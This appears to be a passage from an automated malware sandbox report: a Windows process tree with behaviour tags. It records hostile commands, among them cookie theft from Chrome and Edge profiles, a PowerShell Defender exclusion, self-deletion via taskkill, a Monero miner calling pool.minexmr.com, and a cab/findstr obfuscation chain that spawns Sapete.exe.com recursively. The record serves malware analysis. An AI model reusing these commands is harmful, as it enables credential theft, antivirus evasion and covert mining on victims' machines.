                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5204 /prefetch:8
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:3156
                                                                                                                                                                              • C:\Users\Admin\Downloads\EmsisoftEmergencyKit.exe
                                                                                                                                                                                "C:\Users\Admin\Downloads\EmsisoftEmergencyKit.exe"
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:352
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    "C:\Windows\explorer.exe" /select,"Start Emergency Kit Scanner.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4120
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "cmd.exe" /C taskkill /F /PID 6244 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4148
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /F /PID 6244
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:4560
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "cmd.exe" /C taskkill /F /PID 6244 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:3880
                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                        taskkill /F /PID 6244
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:4528
                                                                                                                                                                                • C:\Users\Admin\Documents\4efeRxQJJ12zwxNcmojml1Pu.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\4efeRxQJJ12zwxNcmojml1Pu.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4328
                                                                                                                                                                                  • C:\Users\Admin\Documents\uUF0atfnNdd21kTnNYUAhIyj.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\uUF0atfnNdd21kTnNYUAhIyj.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4320
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:5220
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:6112
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5096
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4180
                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 4320 -s 1552
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5604
                                                                                                                                                                                        • C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4312
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe" -Force
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:5576
                                                                                                                                                                                          • C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                            PID:5732
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\winsetupcom.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\winsetupcom.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              PID:5212
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.minexmr.com:4444 -u 44iQQ1yP3JMbnSdzoY3GzYUUfESrEGEfKakyhxt1FqjfcktWxXkhaGjEs96Y7jJfnEeHa37h4Cjf6cQgA8GzAaGnGPGgkxR -p x -k -v=0 --donate-level=1 -t 1
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:4508
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.minexmr.com:4444 -u 44iQQ1yP3JMbnSdzoY3GzYUUfESrEGEfKakyhxt1FqjfcktWxXkhaGjEs96Y7jJfnEeHa37h4Cjf6cQgA8GzAaGnGPGgkxR -p x -k -v=0 --donate-level=1 -t 1
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:6248
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:3788
                                                                                                                                                                                            • C:\Users\Admin\Documents\FOlaPszW2GVODMR3ezIbHQJx.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\FOlaPszW2GVODMR3ezIbHQJx.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:5104
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpE7A6_tmp.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\tmpE7A6_tmp.exe"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:2576
                                                                                                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                  "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5052
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Ogni.cab
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:6092
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:4632
                                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                            findstr /V /R "^kFkkCweteokIGxUGjOtmnesFfoGwECEIbjuYaFuyaLppmuaDjBQwmHGogFWzxwmADClxhWhHHYuNSiuoQrPrLC$" Mette.cab
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:4780
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                              Sapete.exe.com L
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                              PID:5952
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                PID:4868
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                  PID:2152
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                    PID:6692
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:5156
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                          PID:5424
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                            PID:6464
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                              PID:7432
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                  PID:7504
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                    PID:7760
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                      PID:4620
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                        PID:5768
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                            PID:2260
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                                                PID:5228
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                    PID:6852
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                                                        PID:5188
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                            PID:7028
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                              23⤵
                                                                                                                                                                                                                                                                PID:7744
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                    PID:2316
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                                        PID:7464
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                            PID:6160
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                PID:740
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                  28⤵
                                                                                                                                                                                                                                                                                    PID:7688
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                      29⤵
                                                                                                                                                                                                                                                                                        PID:3436
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                                                                                                            PID:3996
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                                PID:6736
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                    PID:6908
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                      33⤵
                                                                                                                                                                                                                                                                                                        PID:7032
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                          34⤵
                                                                                                                                                                                                                                                                                                            PID:3280
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                              35⤵
                                                                                                                                                                                                                                                                                                                PID:7572
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                  36⤵
                                                                                                                                                                                                                                                                                                                    PID:7364
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                      37⤵
                                                                                                                                                                                                                                                                                                                        PID:3964
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                          38⤵
                                                                                                                                                                                                                                                                                                                            PID:5088
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                              39⤵
                                                                                                                                                                                                                                                                                                                                PID:7836
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                  40⤵
                                                                                                                                                                                                                                                                                                                                    PID:5332
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                      41⤵
                                                                                                                                                                                                                                                                                                                                        PID:5216
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                          42⤵
                                                                                                                                                                                                                                                                                                                                            PID:5704
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                              43⤵
                                                                                                                                                                                                                                                                                                                                                PID:7456
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                  44⤵
                                                                                                                                                                                                                                                                                                                                                    PID:7320
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                      45⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7236
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                          46⤵
                                                                                                                                                                                                                                                                                                                                                            PID:7568
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                              47⤵
                                                                                                                                                                                                                                                                                                                                                                PID:7244
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:7852
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                      49⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:4820
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                          50⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5880
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                              51⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5088
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                  52⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:4608
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                      53⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5588
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                          54⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8380
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                              55⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:8680
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                  56⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:8908
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                      57⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:8244
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                          58⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1876
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                              59⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:8660
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                                  60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6928
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
